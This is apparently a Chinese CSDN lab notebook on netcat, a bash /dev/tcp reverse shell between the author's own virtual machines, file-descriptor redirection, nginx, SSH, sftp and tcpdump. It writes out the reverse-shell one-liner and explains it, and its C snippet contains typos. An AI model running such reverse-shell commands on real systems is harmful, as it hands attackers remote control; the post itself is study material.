环境:
kali:
┌──(kali㉿kali)-[~/Desktop]
└─$ cat /proc/version
Linux version 6.0.0-kali5-amd64 ([email protected]) (gcc-12 (Debian 12.2.0-9) 12.2.0, GNU ld (GNU Binutils for Debian)
1. 建立一个简单的链接进行nc,可以进行两个端口通信!
#首先使用nc监听端口
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvp 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 47210
#使用nc链接本地端口
┌──(kali㉿kali)-[~/Desktop]
└─$ nc 127.0.0.1 1234
hello
ls
2. 试图向/dev/tcp/127.0.0.1/1234发送数据失败!
原因:反弹shell失败 原来是这个原因_反弹shell时kali监听不到端口数据怎么办-CSDN博客
kali无法实现因为:kali的bash是默认关闭bash的网络重定向选项,也就是–enable-net-redirections选项
解决方法重写下载bash并重新编译:
wget https://ftp.gnu.org/gnu/bash/bash-5.1.tar.gz
tar -xzvf bash-5.1.tar.gz
cd bash-5.1
./configure --enable-net-redirections
make
sudo make install
3.在Ubuntu上实现向本地端口发送数据
这个文件路径是虚拟的:/dev/tcp/127.0.0.1/1234
tty1:
brinmon@brinmon-virtual-machine:~/桌面$ nc -lvp 1234
Listening on 0.0.0.0 1234
Connection received on localhost 59588
djajaslkdjalskdjlaksjdlka
tty2:
brinmon@brinmon-virtual-machine:~/桌面$ cat 1.txt > /dev/tcp/127.0.0.1/1234
4.实现反弹shell
攻击者机器Windows 10:
环境:netcat 1.11 for Win32/Win64 (eternallybored.org)
#监听1234端口
┌──E:\ReverseTools\netcat-win32-1.12
└─>nc -lvp 1234
被攻击者:Ubuntu
#被攻击者执行该命令
┌──brinmon@brinmon-virtual-machine:~/桌面
└─$ bash -i >& /dev/tcp/192.168.235.1/1234 0>&1
这条命令的作用:
- 通过bash启动一个shell命令窗口,将这个窗口的输出重定位到攻击者的机器上
- 0>&1 ,1代表标准输出,已经指向攻击者的机器了,所以这条命令的作用是将标准输入也重定向到攻击者的机器
注:192.168.235.1是本机的网关,因为是本地所以可以不需要是用ip,当然也可以使用
命令解释:
0. /dev/tcp/192.168.235.1/1234 攻击者开启的端口
bash -i启动一个shell命令窗口>表示重定向输出&表示将标准输出和标准错误重定向到同一个地方0表示标准输入(stdin)。1表示标准输出(stdout)。0>&1表示将标准输入重定向到标准输出,使得输入和输出都通过前面建立的 TCP 连接进行传输。
成功获得shell:
5.文件描述符的使用
#include <stdio. h>
int main() {
FILE *f = fopen( "1.txt" ,wb");//会创建文件描述符3
system( "echo hello123 >&3");//>&3默认就算将0>&3,将标准输出重定向到文件1.txt
fclose(f);
}
6.搭建网页服务器
- 安装nginx服务
root@brinmon-virtual-machine:/home/brinmon/桌面# apt-get install nginx
- 查看是否启动nginx服务
root@brinmon-virtual-machine:/var/www/html# sudo systemctl status nginx
● nginx.service - A high performance web server and a reverse proxy server
Loaded: loaded (/lib/systemd/system/nginx.service; enabled; preset: enabled)
Active: active (running) since Tue 2024-05-21 22:14:18 CST; 4min 47s ago
Docs: man:nginx(8)
Process: 3469 ExecStartPre=/usr/sbin/nginx -t -q -g daemon on; master_process on; (co>
Process: 3470 ExecStart=/usr/sbin/nginx -g daemon on; master_process on; (code=exited>
Main PID: 3558 (nginx)
Tasks: 5 (limit: 2219)
Memory: 6.2M
CPU: 35ms
CGroup: /system.slice/nginx.service
├─3558 "nginx: master process /usr/sbin/nginx -g daemon on; master_process o>
├─3560 "nginx: worker process"
├─3561 "nginx: worker process"
├─3562 "nginx: worker process"
└─3563 "nginx: worker process"
- 可以去目录下编辑网页
root@brinmon-virtual-machine:/home/brinmon/桌面# cd /var/www/html
root@brinmon-virtual-machine:/var/www/html# ls
index.nginx-debian.html
index.nginx-debian.html就是我们的网页了!可以手动修改访问这个网页直接输入本机ip就好了!
成功:欢迎来到nginx! — Welcome to nginx!
7.ssh连接vm虚拟机
教程:SSH远程连接linux虚拟机详细步骤(超详细)_ssh连接虚拟机-CSDN博客
-
设置虚拟机的网络模式为NAT模式
-
在linux上下载ssh服务,openssh-server
#下载ssh服务
root@brinmon-virtual-machine:/var/www/html# sudo apt install openssh-server
#重启服务
root@brinmon-virtual-machine:/var/www/html# sudo service ssh restart
- 通过Windows连接linux
# ssh 用户名@ip地址 可以连接服务器
E:\ReverseTools\netcat-win32-1.12>ssh [email protected]
ssh: connect to host 192.168.235.128 port 22: Connection refused
E:\ReverseTools\netcat-win32-1.12>ssh [email protected]
The authenticity of host '192.168.235.128 (192.168.235.128)' can't be established.
ECDSA key fingerprint is SHA256:BYd+bOcoliIL45ML4l90wD1g8ljJ2eRIihPgCQg4wZo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.235.128' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 23.04 (GNU/Linux 6.2.0-39-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
15 更新可以立即应用。
这些更新中有 1 个是标准安全更新。
要查看这些附加更新,请运行:apt list --upgradable
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
brinmon@brinmon-virtual-machine:~$ ls
公共的 模板 视频 图片 文档 下载 音乐 桌面 pwndocker snap tools
8.sftp进行文件传输
E:\ReverseTools\netcat-win32-1.12>sftp [email protected]
[email protected]'s password:
Connected to 192.168.235.128.
sftp> ls
flag.txt pwndocker snap tools
sftp> get flag.txt
Fetching /home/brinmon/flag.txt to flag.txt
/home/brinmon/flag.txt 100% 23 7.6KB/s 00:00
sftp> put nc.exe
Uploading nc.exe to /home/brinmon/nc.exe
nc.exe 100% 38KB 3.4MB/s 00:00
成功下载文件:
9.Linux抓包
#就可以开始抓包了
root@brinmon-virtual-machine:/home/brinmon/桌面# tcpdump -i ens33 -w 1.cap
可以将文件传入Windows用NetAnalyzer来分析流量包!
标签:1234,shell,kali,虚拟机,文件传输,192.168,machine,nginx,brinmon From: https://blog.csdn.net/qq_65474192/article/details/139112813